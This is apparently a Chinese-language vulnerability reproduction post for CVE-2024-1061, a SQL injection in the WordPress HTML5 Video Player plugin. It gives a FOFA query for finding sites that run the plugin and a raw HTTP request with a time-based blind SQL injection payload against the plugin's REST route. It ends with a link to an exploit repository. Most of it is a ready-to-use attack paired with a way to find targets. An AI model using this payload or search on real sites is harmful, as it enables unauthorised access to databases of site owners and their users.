漏洞复现-WordPress HTML5 Video Player SQL注入漏洞(CVE-2024-1061)附POC

fofa："wordpress" && body="html5-video-player"

GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+ HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

https://github.com/Y1-K1NG/poc_exp/tree/main/20240218WordPress%20Plugin%20HTML5%20Video%20Player%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E